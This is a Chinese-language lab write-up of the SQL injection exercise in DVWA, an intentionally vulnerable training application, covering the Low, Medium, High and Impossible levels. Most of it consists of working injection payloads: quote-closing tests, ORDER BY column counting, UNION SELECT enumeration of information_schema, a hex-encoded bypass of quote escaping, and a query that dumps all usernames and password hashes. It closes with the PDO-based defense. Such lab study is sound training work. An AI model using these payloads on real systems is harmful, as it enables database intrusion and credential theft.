SQL Injection

实验准备

Low

判断是否存在注入，注入是字符型还是数字型

当输入的参数为字符串时，称为字符型。字符型和数字型最大的一个区别在于，数字型不需要单引号来闭合，而字符串一般需要通过单引号来闭合的。

输入1，查询成功

输入1’ and ‘1’ ='2，查询失败，返回结果为空。说明不存在数字型注入漏洞

输入1’ or ‘1234’='1234，查询成功。说明存在字符型注入

猜SQL查询语句中的字段数

输入1’ or 1=1 order by 1 #，查询成功

#是注释作用

输入1’ or 1=1 order by 2 #，查询成功

输入1’ or 1=1 order by 3 #，查询失败
说明执行的SQL查询语句中只有两个字段，分别是 First name、Surname

确定显示的字段顺序

输入1’ union select 1,2 #，查询成功
说明执行的SQL语句为select First name,Surname from 表 where ID=’id’…

获取当前数据库

输入1’ union select 1,database() #，查询成功
说明当前的数据库为dvwa

获取数据库中的表

输入1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，查询成功
说明数据库dvwa中一共有两个表，guestbook与users

获取表中的字段名

输入1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=‘users’ #，查询成功
说明users表中有8个字段，
分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login

下载数据

输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查询成功
得到了users表中所有用户的user_id,first_name,last_name,password的数据

对MD5进行在线**为明文密码

Medium

查看源码

Medium级别的代码利用mysql_real_escape_string函数对特殊符号\x00,\n,\r,,’,",\x1a进行转义。虽然前端使用了下拉选择菜单，但我们依然可以通过抓包改参数，提交恶意构造的查询参数

利用burpsuite抓包。判断是否存在注入，注入是字符型还是数字型

抓包更改参数id为1′ or 1=1 #。报错，说明不是字符型注入漏洞。

抓包更改参数id为1 or 1=1 #。查询成功，说明是数字型注入漏洞。
由于是数字型注入，服务器端的mysql_real_escape_string函数就形同虚设了，因为数字型注入并不需要借助引号

猜SQL查询语句中的字段数

抓包更改参数id为1 order by 1 #，查询成功

抓包更改参数id为1 order by 2 #，查询成功

抓包更改参数id为1 order by 3 #，报错。
说明执行的SQL查询语句中只有两个字段，即这里的First name、Surname。

确定显示的字段顺序

抓包更改参数id为1 union select 1,2 #，查询成功
说明执行的SQL语句为select First name,Surname from 表 where ID=id…

获取当前数据库

抓包更改参数id为1 union select 1,database() #，查询成功
说明当前的数据库为dvwa。

获取数据库中的表

抓包更改参数id为1 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #，查询成功
说明数据库dvwa中一共有两个表，guestbook与users。

获取表中的字段名

抓包更改参数id为1 union select 1,group_concat(column_name) from information_schema.columns where table_name=’users ’#，查询失败。因为单引号被转义了，变成了\’。可以利用16进制进行绕过1 union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #
说明users表中有8个字段，分别是user_id,first_name,last_name,user,password,avatar,last_login,failed_login。

下载数据

抓包修改参数id为1 or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查询成功
得到了users表中所有用户的user_id,first_name,last_name,password的数据

High

查看源码

High级别的在SQL查询语句中添加了LIMIT 1，以此控制只输出一个结果。可以通过#将其注释掉
判断是否存在注入，注入是字符型还是数字型
1′ or 1=1 #，成功。说明是字符型注入漏洞

1 or 1=1 #，成功。说明存在是数字型注入漏洞。

猜SQL查询语句中的字段数

1’ order by 1 #

1 order by 1 #

1 order by 2 #

1’ order by 2 #

1’ order by 3 #

确定显示的字段顺序
1’ union select 1,2 #

获取当前数据库

1’ union select 1,database() #

获取数据库中的表

1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() #

获取表中的字段名

1’ union select 1,group_concat(column_name) from information_schema.columns where table_name=0×7573657273 #

下载数据

输入1’ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #，查询成功

Impossible

查看源码

可以看到，Impossible级别的代码采用了PDO技术，划清了代码与数据的界限，有效防御SQL注入，同时只有返回的查询结果数量为一时，才会成功输出，这样就有效预防了“脱裤”，Anti-CSRFtoken机制的加入了进一步提高了安全性。